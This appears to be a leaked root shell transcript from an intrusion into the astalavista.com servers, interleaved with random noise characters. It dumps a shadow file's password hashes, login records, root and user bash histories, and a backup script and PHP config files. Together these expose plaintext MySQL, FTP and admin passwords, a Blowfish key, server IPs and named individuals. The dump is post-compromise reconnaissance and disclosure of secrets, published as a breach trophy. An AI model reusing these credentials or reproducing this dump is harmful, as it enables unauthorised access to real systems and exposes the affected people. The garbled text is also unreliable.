[snip]. O* [8 ?: W& R; f2 b3 ]
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::% {5 ^6 o4 c" c
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
# N, d& J/ }: f# wcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::# D3 b8 l* |9 g) G" ~8 U7 F# f2 v
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
) h9 q! Q0 b: f8 n( \8 W0 w
- H9 ^$ C" `' d! {$ jsh-3.2# cat /etc/motd
/ `& M$ s0 A& h" m$ J, n#####################################################( d- P( k K5 @+ M3 ~
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #/ j1 c) ~/ b; ]) s2 B8 c( U
# |__| [__ | |__| | |__| | | | [__ | |__| #
$ v r3 F7 ~# f( @2 P# | | ___] | | | |___ | | \/ | ___] | | | #: d1 p/ z( G7 B8 x: K* K. |
# #
+ u) X" r; j, T- ?; }#####################################################
: x# e9 D) \0 k" O9 I, V8 T# #
% [7 n# V! h7 D& J- _9 [" n/ T# Admin Contact - 链接标记support@secureservertech.com #/ W% F0 q% [& |/ ~0 \
# #
% \; w% b: A) ^3 ]) Z# j# Available ShortCuts #0 d) M9 W5 }/ k+ [! R
# #$ @$ s) F# }6 f& C+ k; C
# nst - list active connections #( Y: p* ?( i) h% U8 N( U. F* [# L
# ddos - shows how many times each ip is connected #* O- ~8 W2 c* L$ i# V
# ltr - restart the webserver #
, j) {* w# U; `1 t5 C( Y# phpc - edit the php config file #6 F7 t* q: }) F% {: ^- N
# htc - edit the webserver configuration file #
" g2 T7 V& R& K1 G, F# up - uptime #7 ~. G# H# M' `. H7 A% q
# etd - edit the motd of the day file #
3 A3 _9 P! p5 J9 K1 {" k v# htr - start and restart apache if needed #
/ W9 P3 B* z5 m: y" e8 C# syng - shows active SYN_RECV connections #
$ U, Z/ k/ M/ r, {$ I4 x. N/ U/ H# synd - syn flood blocker - “synd -h” for usage #
5 {0 K6 R: X0 f' y#####################################################
& R7 S: i$ N# U! U# NOTES: #
5 k' @1 e+ e( S! S4 r, s2 e: d# Last Upgrade - 12-08-2008 by JF #$ p4 B2 O: ]4 W+ U+ t' v( _4 ]6 C
# My.cnf/Mysql Optimization - 1-28-09 #& \" s/ u7 {7 {- ~5 m( w
# #
& { v, D6 _4 @0 X# #4 D7 S! s2 }1 L5 U( ^, O
# #: n" r9 L: v% ^! c% J
#####################################################
' Y% Y3 q$ U3 A3 p
8 B. c! Q% b7 ?, c4 G* H" |+ Ysh-3.2# lastlog | grep -v Never* j3 P: O P% z$ U& I7 N- |7 F, F
Username Port From Latest
+ a4 ?/ i( Z2 H7 R* Sroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009- o; s3 r' j: |# R! R/ d; M5 `3 Y
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
8 w1 h# |7 |- C8 ]/ j& n1 rcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
. ^/ P( S, N0 w5 N. h* Y* aastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
3 m, x2 h! \3 D) V
' f4 h2 ^; U8 b5 Ssh-3.2# ls -la
2 W& @7 |- a, x4 v8 I0 atotal 453376% o, @8 B3 G( M( s: D) U
drwxr-x— 15 root root 4096 Jun 4 08:40 .
- `& u8 g: r( O6 s# fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
# S$ Q1 P' N: L; I8 P$ b-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
5 a4 K& R4 a& { u e# z. b-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
6 x5 \& _ n9 X2 g-rw——- 1 root root 16836 Jun 4 07:21 .bash_history; }2 E0 r U+ ^8 P1 k/ b" R6 S) r
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout# n! J( c* B5 `* R& d) ~2 N4 ?& R
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile$ U' V O4 }. k; t5 D
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc8 B# K- ~9 e: F$ P5 D, N
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh% d- N# O; A: t" t1 X2 k
-rw-r–r– 1 root root 1327 Nov 29 2007 cert7 I8 w5 A; k# {
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql8 @. c G* A8 I
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
+ P3 q, y. a* m-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc* w* w7 s2 M8 U1 S% y$ t7 u! L7 K, H
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
6 L# j2 k# {8 F( A, Vdrwx—— 2 root root 4096 Oct 28 2007 .elinks
1 M! |% L: B+ E; ~5 xdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.17 s- C" t* g& M, G; n' ^$ x
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz20 R( Y9 o6 D; p" A# ` m$ c3 Y" T
-rw——- 1 root root 0 Apr 16 13:19 .history
) w. k6 ~( F, f1 W-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
3 [4 B3 n M- W1 ^/ t-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog% H9 D9 {9 Q$ q: I# \
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
' H5 s8 M& t3 W-rw——- 1 root root 35 Jun 2 14:23 .lesshst% t8 t8 e4 { V# Z
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp) }$ Q( l: L" A+ W* |3 ?
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec2 V8 ?1 }6 G& j& G& i* R5 z
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz* [# F4 P1 r7 L% \
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
! p9 w! g4 C+ k: O) ?-rwx—— 1 root root 760 Sep 18 2008 lp
1 {) c; j! Q/ H ldrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.12 i& J8 l. ^ ]8 s. y' k. n: @ e- ?+ @
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
) `. \& n0 u, {8 p( R+ n6 K1 N7 }-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1# Y* ]5 N- f, T& g9 j& x5 F* M! n
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
1 J8 l$ O" K* R) N-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
9 O4 n) E. x7 Q6 {" C, b& rdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
/ F( f! T4 U+ Z- [7 i! o1 G-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz( f+ X D: x5 u, o
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
4 P1 G0 X0 ^# [ d1 Z-rw——- 1 root root 41 Oct 19 2007 .my.cnf0 Z/ N* S3 O1 B$ E `0 D
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history6 b* G; a+ n0 U R) v8 R! I6 f
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport' L8 @; p7 D0 M( k0 N( g. @
-rw——- 1 root root 41 May 20 2008 .mytop5 g& g: |# H8 f" z
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6; k2 P' q. I% z+ d% X4 N4 o
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
" R1 `' C3 \7 ydrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp' K- S9 o. X, p
-rw——- 1 root root 1462 Sep 21 2007 opt.php; x% z3 a+ L9 z1 f Q. D* D
-rw-r–r– 1 root root 3371 Sep 22 2007 p
6 q; q# X v3 o- X" S3 \* X, A-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
$ d+ P( |; a* O* e-rw——- 1 root root 1024 Feb 3 21:32 .rnd# Q: n. k0 Y/ T; e" k9 \( B& ?
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr X1 n1 d# M6 M' Q" s
-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 j, `( g# B- P6 I
drwx—— 2 root root 4096 Oct 10 2008 .ssh
, Q) u8 b2 Q) b1 y/ S-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
1 [: _5 ]- w; c-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
) N* C4 U9 l! W: C: D, g+ ?9 Y- v) P/ Y' O-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip8 h- q/ N$ [" w0 N* ~- d) p# O. R0 [0 N
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1/ C- ]; B) u* g( p
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
9 S8 _% x6 C# _1 _-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
* N" U' j% G2 h3 C; ?drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0/ C) Y& b% `" n6 W0 W
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2) c" E2 S# G) D" e! z+ Y
-rw——- 1 root root 12997 May 16 2008 .viminfo
' x: W' F8 L" s1 ~$ v- n- p6 U' s; S' g
sh-3.2# cat .bash_history) R \1 k/ X1 ~- n! A$ W% L
[snip]
3 t% e# C7 v: Z. D' t$ M& hwget cp4sst.com/sstlinux.tar.gz
, P6 \" g3 m! z4 j* Z0 ptar zxvf sstlinux.tar.gz
1 d% B( j- T& Q* Z" q8 } Icd linux-2.6.27.10
2 n* c/ i6 c" B' s/ v9 Rsh install.sh
% w& ?6 S* [1 F6 M. H& mmake bzImage ; make modules ; make modules_install ; make install# [: _% s& h6 ~6 L' d
make clean
) m! J8 k7 Y+ q& B$ _& I1 ~- |service mysqld restart: f8 w, l5 D6 p. T9 X& d
[snip]
9 K" `6 j T: E& mcd /usr/sbin/
! U6 d/ Y- Q* g8 o5 ^chmod 4777 traceroute
2 _3 w8 }& ? ]: T* Y* K* xchmod 4777 ping
4 S2 z5 L* _; f$ }6 c1 \) K1 M5 t1 Ctraceroute -I 链接标记[url]www.astalavista.ch[/url]/ {1 P m. s+ x) O* \& w% A
[snip]
6 L+ j) a1 D; O9 K& Kvi /etc/csf/csf.conf, A' [$ r# Z+ F7 |/ r
traceroute google.ch; i2 I- X1 T3 \+ Q# i' _! e
service csf restart; g& A. P% ?( C) M9 e& A- W
tracert google.ch
/ R: z, z, {9 P6 D: o$ C* xservice csf restart0 E7 c" b4 {' I, j! \9 R
traceroute 链接标记[url]www.google.ch[/url]/ G8 ?! q* U3 |
tracert 链接标记[url]www.google.ch[/url]! z, U. H; [: A" [) l, Z
traceroute 链接标记[url]www.google.ch[/url]
. B* o9 _$ p" p6 glocate traceroute7 R$ v j7 u& O+ G: {& c) A: M
chown 4755 /bin/traceroute
) e5 v# o$ ?+ m! e3 y9 Schown 4777 /bin/traceroute- i1 O5 e/ T' }/ N8 @* l
locate ping& M3 n$ Z& B2 t7 N2 W0 G, _3 G2 R9 A
chown 4755 /bin/ping
+ K* k7 z+ n4 |% B9 nchown 4777 /bin/ping5 y) }# n2 R* f! G) O! m. Y/ T
cd /bin/
; @$ m! X% z0 K Jls -ali | grep ping, z% }0 U& ^3 D; ?: e
chown root ping
5 ~/ Q8 m+ F2 h1 U# y% V& Ochmod 4755 ping. o8 g. y. T; M4 J2 L5 r
ls -ali | grep traceroute
7 c' ^; Y/ l6 |1 Schown root traceroute
* `! s+ d- D5 s$ ichmod 4755 traceroute7 \) {2 X5 L- O3 y
ls -ali | grep traceroute
9 u, F, k" e# N- K# E! Otraceroute -I 链接标记[url]www.google.ch[/url]
* K% M M* R7 B$ J; ntraceroute 链接标记[url]www.google.ch[/url] m& R2 J9 R$ V# Q" b
whois pmsantos.ch
( f: E5 x* _8 U1 J; ?[snip]
. M- Y$ T* ~0 F+ Y7 z4 Lmysql -h com_contrexx2_live < /root/defaultp_ports.sql
" H5 W7 Y- L! Omysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql4 f4 P( |% N% \# N
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
6 W# J4 [, f* w/ I. E! h- mmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql" t! |4 m* _! z2 }4 Z! m' d' [/ s7 q: g
top" c8 f8 k* n \$ k- ~
ping ssth.ch8 f( D" V0 G+ A6 C" f, l9 k
ping asdlkfaljgasd???ljg???lasj.ch
" L% H6 H) p2 I/ m& b6 l7 z, e6 z& Gping asdlkfaljgasdlasj.ch
( T. O, _( ` i; R/ U. ?" @# d+ Uping 链接标记[url]www.ssth.ch[/url]
- M" O% c3 [. e" D; \: {6 E8 w: aping ssth.ch
; W6 W* f- d& D( a+ N- I+ C, L! \% nnslookup 链接标记[url]www.google.ch[/url]* f( ]% P, ^* p0 X, y! b \: m A1 I
nslookup 链接标记[url]www.ssth.ch[/url]" e" Q! h1 ]' ^2 g l
man nslookup$ R. f- ^+ U$ m9 T! u7 A) s
ping 链接标记[url]www.google.ch[/url]; l! y2 f. t6 G- T) z( r
nslookup 链接标记[url]www.google.ch[/url]
; H' B. _" b/ Bnslookup 链接标记[url]www.google.ch[/url]
8 K* ?+ y; L( m" }( X; ]0 Hnslookup salfjasdlf.ch2 M1 `" V, N* |) @) c4 s$ ~- v) s' Z
[snip]
0 h( ]$ p6 v7 y7 [! J+ Bopenssl passwd -1 sadf8 C' J$ X% d" r
openssl passwd -1 5cZNHstdTy
% X2 Y' y q1 Z9 `mysql
8 W1 U) i$ r: g4 q% f2 Z0 ^& rmysql
/ j- V$ n. ?. X1 A& f; ~: v* llocate proftp. T" B; y6 g. `* B) N- a
vi /etc/proftpd.passwd
+ L) d2 \# F7 }; V' R; W2 _" Cservice proftpd restart
" _" R" }' ~" glocate proftpd.conf
. E7 M& e% Z$ U t7 w! s! C u# tvi /etc/proftpd.conf
: Q3 w# w J) k$ m2 ~; w9 Jvi /etc/proftpd.passwd
+ @! k7 F I1 P' R) }% U% rservice proftpd restart1 N& q1 i+ D# m0 O3 E
[snip]
7 G" d8 R# f! i) Q, W: o' I" U/bin/sh /home/com/backup_system/backup.sh
* g- |$ T2 l& h. I0 @tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
/ g) K* f7 l+ Omysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
' r7 ~+ t5 ]. G6 A, m( Mmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
) a6 y3 [- Z- qls -ali+ P% }/ f. d# K9 u4 q+ k# f+ C
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
& d0 P% ]& {+ ]; Smysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql/ G: H% j/ i( g8 ^4 X1 s) m
crontab -l
& D( K9 X0 r7 ~& Ncrontab -l2 d1 Q/ U, W# G- w
php -q /home/com/public_html/modifications/cronjobs/securitynews.php# O9 c$ T: i5 |/ w8 g+ J
/home/com/public_html/modifications/cronjobs/exploits.sh) Q5 r5 h8 x; k) p+ U
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]5 S9 U' _# W x3 {* \
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
! {: ?0 c$ }+ ~! \0 `" Bcd lsws-4.0.3
- r7 _" H; r3 z* v3 ^* p& z0 dsh install.sh, q! F. k( \3 C6 W( u' y
uptime
. B: |! _2 O( S+ w, @* G( Yhdparm -tt /dev/sda4 M O9 [; t& ^ {
iostat" }: Q' c* b* {% b. k/ p
yum install iostat% [ x# t/ z, k ^9 s
iostat
/ Q/ |0 P% C) h+ k2 o8 jwhereis iostat2 B+ {. `# T" f- U
yjm clean all
6 }$ A5 h# H$ s: D, T8 v4 Z fyum clean all ; yum -y update
4 F7 \. ^( O- r2 s! uiostat
; `$ v8 ^2 d4 m. |* g0 Gyum install systat
8 Q( {4 n, G' ~- krpm -qa | grep iostat* k5 D. G4 l- @5 V
rpm -qa | grep sysstat
& O5 j/ L8 z6 |" \7 arpm -qa | grep systat4 T: L2 s1 |. @! W& W* v3 U7 Q
dmesg -c: ^( [- s% I) s- M R
sysctl -p% a% g9 r# m! r
uname -r
2 y5 f0 Y" n3 d" D, \/ I. e* zcd /usr/src
: H3 a/ z7 g. Y' gwget nix101.com/kernels/sstlinux.tar.gz" y+ @- M; z" z2 E) f9 J
shutdown -r now6 r% b7 z) T6 m. ?
nano -w /boot/grub/grub.conf
9 `# N; D# m% L+ V* r: s+ Y
3 q; S& J2 y2 p( q' ?1 F8 Zsh-3.2# cat .my.cnf
# \ Z9 o' l' N' d# f% m[client]( }( `, U) _4 ?/ T
user=da_admin+ J, T5 \5 ~1 U# d
password=X9dctmRH
+ C+ o1 o: ?8 c4 m W" }( m- s
7 q* \& \6 i: u& W5 k* t9 p. I. Msh-3.2# cat /home/com/backup_system/backup.sh
) `1 n$ G0 B7 V#!/bin/sh) D' U# L. O% I# c, _
#####################################################################1 x! R! P' v9 z8 n' n; \6 y9 B, v; ~
# #7 S- d8 x4 E! P
# incremental backup for astalavista.com #
1 x. q5 N+ D% H: G2 y# #
. a6 Q# Y8 }' |7 u0 F; ?# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
: v* [1 s* h* \5 P9 A# #' L- v+ z; i. w# g. j* X0 _/ x! ~
#####################################################################" J% t" d: E. S
[snip]; z: f+ }# b* e: M+ M0 X
PROG_DIR=”/home/com/backup_system”;3 X7 j' T7 u0 d/ J I G
BACKUP_DIR=”/home/com/backups”;
C! _4 J7 \1 b ]# qDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
. h1 L- `2 U/ x' d# ftp for synology backup server
) b; c6 L# z2 }( EFTP_HOST=”212.254.194.163″;
# j' @8 T6 z6 u# JFTP_PORT=”21″;
$ _, Y T6 l8 _& G9 \8 aFTP_USER=”astalavista.com”;
$ u/ U- H/ V9 C2 t) H7 @FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
7 K" P& ?( S, \6 C6 Z5 DFTP_DIR=”/astalavista.com”;" G" l& l2 e1 v4 R' \
# database! W! a/ R, w- R7 q, o1 v% |0 m1 u
DB_HOST=”localhost”;
8 M- |' s. Q/ B) o! Z2 Z5 EDB_USER=”contrexxuser2″;
# B6 p# Q/ |5 p: A. _' cDB_PASS=”0fEYNZgXz1pKe”;
2 v R- z1 B& Y3 yDB_DATABASE1=”com_contrexx2_live”;
6 ~! i: c$ C( p9 @8 F; \& X- R( P; HDB_DATABASE2=”com_contrexx2″;5 q# E$ X0 |& Q& J- X1 h3 C7 Y
[snip]
% n |! t& F2 T0 K% g* y( Vftp -in $FTP_HOST $FTP_PORT <<EOF
0 X: w' d) T! z% O } aquote USER $FTP_USER
) ^: g' Y( p4 G: qquote PASS $FTP_PASS+ C2 p" m5 m! t9 g$ `1 U2 S
cd $FTP_DIR! }) S# p. H8 f7 j& u
put $DB_FULLNAME-SQL_Dump.tar
) o" d/ V6 l# Bput $BACKUP_FULLNAME-Public_HTML.tar
1 y; M5 m" Q, y2 d9 K9 {* H: Kclose& V6 B7 I; [8 \5 x
bye$ `2 ]# \/ `# [$ n
EOF/ U1 u2 u- `4 Z4 i0 E2 m7 R; n
, r' u# i' _; l- s# a- y
sh-3.2# cd /home- ^2 f# d4 G6 X, W% ~8 ?) i. x
sh-3.2# ls -la: \# a; ~, Z: x/ T
total 120; j9 C; u0 M9 G+ L5 U6 N
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .2 `3 u5 X: ] f( z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 M# C P2 O5 H2 _$ b
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
( f( F: \" C) p; y7 |/ H-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
! n2 c; P6 ?4 E) r' N# D-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
0 O1 \2 @5 a. t/ e6 H# [drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
" e6 r, n" ^$ P6 t. ~. t- }$ F$ xdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup! H$ I ^3 z. G/ _5 ~4 Q
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
- Y4 J% C' u) P2 Wdrwx–x–x 10 com com 4096 Apr 28 12:40 com
$ f3 ^! Y# K0 g5 s+ hdrwxr-xr-x 2 root root 4096 May 17 2007 ftp Z* h7 q6 O2 N" ~; Z* w! U3 R
drwx—— 3 jon jon 4096 Sep 21 2007 jon
( b1 c [/ ?- a x& _7 bdrwx—— 2 root root 16384 Sep 11 2007 lost+found
( ^4 G* H: t4 ddrwxr-xr-x 2 root root 4096 Sep 14 2007 my6 m# D g) `3 c' ?- S
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
, ?- F: l6 h$ j1 x8 gdrwx—— 2 jon jon 4096 Sep 15 2007 test
5 `+ W7 t) ]0 \drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
X& H; ^3 p/ O% q' G, x4 ~. G) S$ ?: Z# a, `7 Y6 Z1 X9 X! m
sh-3.2# cd admin) h/ P: d# _4 u% `2 f( w
sh-3.2# ls -la
% \& I8 h- s+ itotal 1735896
4 g% F0 n3 X) S2 S, y% x: S2 Hdrwx–x–x 9 admin admin 4096 Nov 28 2007 .' m8 l1 V; J; O4 |; y! F* m! S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 k1 X; Q* @4 s0 x9 D& q8 qdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups- W: K* B! Y; Y
drwx—— 2 admin admin 4096 Sep 28 2007 backups
# c1 O. n2 ^# c* V! `& B) ]9 z-rw——- 1 admin admin 860 Sep 17 2008 .bash_history1 { l& N6 p7 S. r
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
+ r' z" i0 G% ~/ s) k5 E5 u* I6 P-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
' `9 _; @; x+ s5 L" G7 c4 g! `: r-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
( U! ?6 H: {- Q" ^2 h5 Ddrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups; p+ y0 [: o) R2 G9 T9 I
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
# c" w' ^8 F" b) ~" b7 L$ Wdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
2 R7 @! Q$ t) t, s2 ?3 k3 v-rw-r–r– 1 root root 24 Sep 21 2007 info.php X/ V7 M5 z1 g; x& Z# S
drwx—— 2 admin admin 4096 Sep 21 2007 mail1 e& {% G' i2 J
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* D( m& ]/ L, d5 l; ~-rw-r–r– 1 root root 887 Nov 28 2007 server.key& ], W% V+ |+ |4 d; t$ `: C1 p k
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow$ ^" N2 j0 ?+ N9 i
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
) [# H' R( n& y' n5 Y6 c. f2 zdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
! y2 c$ {! i: t& y) }+ s5 V q8 d0 I1 c& B" _
sh-3.2# ..
* m7 L+ G/ p5 Z, ash-3.2# cd jon
- F! \; z( S# a0 T( s5 Dsh-3.2# ls -la3 R! U2 y1 _( h/ N5 O
total 36
: b0 p6 a- D6 y, jdrwx—— 3 jon jon 4096 Sep 21 2007 .1 N, J( y0 N" {3 l6 h
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- D4 b, }! m; [2 d- d-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
" _! G9 U( r9 \. s1 O5 ~-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout& d; n U e( U# I+ e$ E5 c; q" C: x
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile" r; b( J) Y; k! G w; x) z9 Y
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
/ T. D* r9 p2 P& ?9 k5 |. [# V% _-rw-r–r– 1 root root 24 Sep 21 2007 info.php
+ F" S$ E' p3 t9 r9 U& s$ f4 O+ bdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html5 q% {4 n5 h. c+ @% `) r
% p$ m# s& S+ X. ish-3.2# cd .. ^5 Z) \# Q2 `! L; b- c2 v
sh-3.2# cd test
/ M. C3 }; R$ ]! o! W' ^5 _+ f6 zsh-3.2# ls -la
; {) n4 z; t! B6 S3 z! ptotal 48, @/ q& m) J+ ~7 z9 P" W! E
drwx—— 2 jon jon 4096 Sep 15 2007 .
2 p( { L, s S9 j8 adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 a! `* |+ x2 {1 A-rw——- 1 jon jon 79 Sep 21 2007 .bash_history# H' J0 N4 O9 D( w9 J( }$ w
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
/ G4 K5 N5 y- a- D/ H2 D-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
, n+ Q8 z* f/ O* N-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc: k m( l! X+ z( R6 y
sh-3.2# cat .bash_history$ j3 l' A8 L: a
/usr/bin/mysqladmin -u root password PoliuJhytg670 G7 D- O4 { K/ U4 ~
9 |/ U; i0 J# R r m9 msh-3.2# cd ..) r1 E: `) W% m0 Y) X+ K
sh-3.2# cd astanet
4 `6 _* h7 ~. G( ksh-3.2# ls -la
/ J$ X- B* V4 M* |. C6 Htotal 52/ P+ d1 t. m1 e5 O& F1 _0 k
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .! P9 d& S+ E9 m7 w7 |, ]8 n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ... S6 G- k c7 o: r6 t
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth4 x8 _8 s( g' K, I8 P% n6 s
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! ?! V3 ?% ^: q* ?* k) Z
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
) i; x6 M/ e* d( G' c7 o-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile6 T3 L, F1 G7 L! _ ?4 ?8 j# ^, k2 @
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc* v7 y. S- a8 ` w6 v5 E5 g
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
' a( h, G7 ^, _5 z+ `* }drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
: O5 R- x# Y" E# s' W( ?drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
1 P' h; Z' |7 g9 T, b2 P, b* A i-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
6 S) z m* x/ m$ Z+ olrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html% E: T9 k' R' s% |% p
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow5 ~' C! K* B {- P1 O
9 m+ n- `( D0 Q+ P
sh-3.2# cd auth/
( g" P% k0 ?* f# Qsh-3.2# ls -la
! f7 v6 Y7 ~& F$ _3 ~total 28
3 f/ z- N- V+ B3 A/ R( G0 y8 v/ vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 ., j/ c: n7 s6 C+ t9 R) ]' H
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
* L: w& u% [3 c-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
; R/ J7 S3 I' L-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php# ~4 ]8 }& e/ @' Q
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd+ F' ~2 t0 s E7 d: D
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
7 M3 D9 o( `" j) J& V0 j& d-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
2 w, L4 i5 }$ p' M5 R" G) _
6 }1 I E6 R9 W; u# Csh-3.2# cat hackercontest.config.inc.php
; `6 l0 m. p% f3 B0 c8 q<?PHP
9 Y+ S! u p8 a7 @// Variabeln f?r Verbindung zur Datenbank //8 T! X+ N& a& N5 n' }" o* p
$conxHost = ‘localhost’; // MySQL hostname
/ r! w( A. S# z$ P% C8 A$conxUser = ‘hackercontest’; // MySQL user/ n, N! k" N$ p5 @5 r
$conxPassword = ‘K6m@7dUc’; // MySQL password
o( M3 f9 n$ v/ |" x$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! ?" H- T2 s. m9 g?>
+ u1 ]: J. F, B" ?; n7 t3 xsh-3.2# cat hosting.config.inc.php
0 N. K/ y7 q- t# O' s3 U$ @1 N<?PHP' b' U9 T$ m( e7 u7 q) @
// Variabeln f?r Verbindung zur Datenbank //
/ j2 B/ c% d6 t' L$conxHost = ‘localhost’; // MySQL hostname
